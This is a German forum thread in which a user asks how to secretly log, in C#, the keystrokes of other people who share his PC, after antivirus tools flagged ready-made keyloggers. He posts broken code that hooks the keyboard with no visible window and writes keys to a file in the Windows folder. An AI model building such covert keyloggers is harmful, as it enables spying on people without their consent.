monitoring
-
so hallo...
ik habe nen kleines Problem!
Dat Problem sieht so aus:Auf meinem PC zuhause haben mehrere User zugriff und die machen dann immer irgendwelche scheiße, dass der PC nicht mehr funktioniert
Darum will ich jeden Tastaturdruck aufzeichnen und in eine .txt Datei umwandeln.
Das mit dem .txt Datei schreiben ist kein Problem, mein Problem lautet: wie kann ich mit C# im Hintergrund Tastatureingaben "protokollieren"Ik habe es auch schon mit "keyloggern" probiert, aper mein AntiViren Programm melted dann immer ein Virus...
Wäre echt kuhl wenn Ihr mir helfen könnt!?
gl Johannes
-
schau dir doch mal an wie ein trojaner funktioniert, denn nichts anderes versuchst
du grade zu programmieren :xmas2:
-
komm schau doch du mal was ein trojaner tut?
ich glaube nicht dass die hauptaufgabe eines trojaner ist, key zu loggen!
ein trojaner höhrt verbindungen über bestimmte ports ab um dann auf befehle von hackern zu warten.
und ich will KEIN trojaner programmieren oder siehst du in meinem code irgendwas von Netzwerkmöglichkeiten.
Wenn du eine Ahnung hast, gib mir einfach ein Tipp wie es funktioniert und sonst sei bitte einfach ruhig!!!außerdem musst du mir erst mal ein trojaner zeigen der in C# programmiert wurde...
-
Ich würde lieber versuchen den anderen Usern bei den Rechten zu beschränken, so dass die keinen Scheiss mehr bauen können...
(...von Bespitzeln halte ich gar nichts)
-
trojaner schrieb:
schau dir doch mal an wie ein trojaner funktioniert, denn nichts anderes versuchst
du grade zu programmieren :xmas2:du bist doof
@netadmin:
http://www.codeproject.com/useritems/P-E-K.asp
und
http://www.codeproject.com/csharp/kbdListenerPackage.aspgern geschehen
-
also...
ok wenn ich das c# Projekt downloade funzt alles.
wenn ich nun ein neues project erstelle und folgenden code einfüge.using System; using System.Drawing; using System.Collections; using System.ComponentModel; using System.Windows.Forms; using System.Data; using System.Diagnostics; using System.IO; using Microsoft.Win32; namespace keytest { /// <summary> /// Zusammenfassung für Form1. /// </summary> public class Form1 : System.Windows.Forms.Form { /// <summary> /// Erforderliche Designervariable. /// </summary> private System.ComponentModel.Container components = null; public Form1() { // // Erforderlich für die Windows Form-Designerunterstützung // InitializeComponent(); // // TODO: Fügen Sie den Konstruktorcode nach dem Aufruf von InitializeComponent hinzu // } /// <summary> /// Die verwendeten Ressourcen bereinigen. /// </summary> protected override void Dispose( bool disposing ) { if( disposing ) { if (components != null) { components.Dispose(); } } base.Dispose( disposing ); } #region Vom Windows Form-Designer generierter Code /// <summary> /// Erforderliche Methode für die Designerunterstützung. /// Der Inhalt der Methode darf nicht mit dem Code-Editor geändert werden. /// </summary> private void InitializeComponent() { // // Form1 // this.AutoScaleBaseSize = new System.Drawing.Size(5, 13); this.ClientSize = new System.Drawing.Size(115, 0); this.Name = "Form1"; this.Text = "Form1"; this.Load += new System.EventHandler(this.Form1_Load); } #endregion /// <summary> /// Der Haupteinstiegspunkt für die Anwendung. /// </summary> [STAThread] static void Main() { //Application.Run(new Form1()); KeyboardListener.s_KeyEventHandler += new EventHandler(KeyboardListener_s_KeyEventHandler); string textb; KeyboardListener.UniversalKeyEventArgs eventArgs = (KeyboardListener.UniversalKeyEventArgs)e; textb = string.Format("Key = {0} Msg = {1} Text = {2}", eventArgs.m_Key, eventArgs.m_Msg, eventArgs.KeyData); if(eventArgs.m_Msg == 256) { //save the fucked keys in a file fuck you all :) FileStream s = new FileStream("C:\\Windows\\log.txt", FileMode.Append); StreamWriter x = new StreamWriter(s); x.WriteLine(textb); x.Close(); } else { } } private void Form1_Load(object sender, System.EventArgs e) { } } }
geht das nicht.
ich habe folgendes gemacht:
- die form soll nicht geladen werden, darum habe ich sie auskommentiert
- KbdListener wurde natürlich importiertwarum geht das nicht?
-
wo wir schon bei troyanern sind, kann mir mal jemand nen link von ner homepage geben, wie ein trojaner programmiert wird
danke schonmal
-
www.symantec.com //super troyaner seite
www.microsoft.com //hier gibts günstige trojaner
www.ebay.at //hier kannst du trojaner kaufen :-p